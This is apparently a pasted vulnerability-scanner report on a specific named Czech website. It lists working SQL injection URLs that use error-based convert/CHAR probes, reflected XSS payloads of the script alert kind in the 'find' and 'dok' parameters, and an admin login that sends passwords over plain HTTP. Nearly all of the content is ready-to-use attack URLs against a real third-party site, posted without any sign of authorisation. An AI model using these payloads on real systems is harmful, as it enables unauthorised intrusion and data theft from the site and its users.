konopa.cz

1. [High Possibility] SQL Injection
2.  
3. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
4.  
5. http://www.konopa.cz/index.php?dok=%27
6. http://www.konopa.cz/?find='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
7. http://www.konopa.cz/index.php?dok=%27&find=hledaný výraz
8. http://www.konopa.cz/index.php?find='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
9. http://www.konopa.cz/index.php?dok=0137&find='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
10.  
11. |||
12.  
13. XSS
14.  
15. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
16.  
17. http://www.konopa.cz/?find='"--></style></script><script>alert(0x000008)</script>
18. http://www.konopa.cz/index.php?find='"--></style></script><script>alert(0x00007B)</script>
19. http://www.konopa.cz/index.php?dok=0137&find='"--></style></script><script>alert(0x0000A3)</script>
20. http://www.konopa.cz/index.php?dok=0107'"--></style></script><script>alert(0x0000D4)</script>
21.  
22. |||
23.  
24. Password Transmitted Over HTTP
25.  
26. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
27.  
28. http://www.konopa.cz/admin/
29. Form target action: index.php
30.  
31. *
32.  
33. http://www.konopa.cz/admin/index.php
34.  
35. *
36.  
37. URL: http://www.konopa.cz
38. Vulnerability Chart --> screen: http://img24.eu/hosting/di-Q1IK.jpg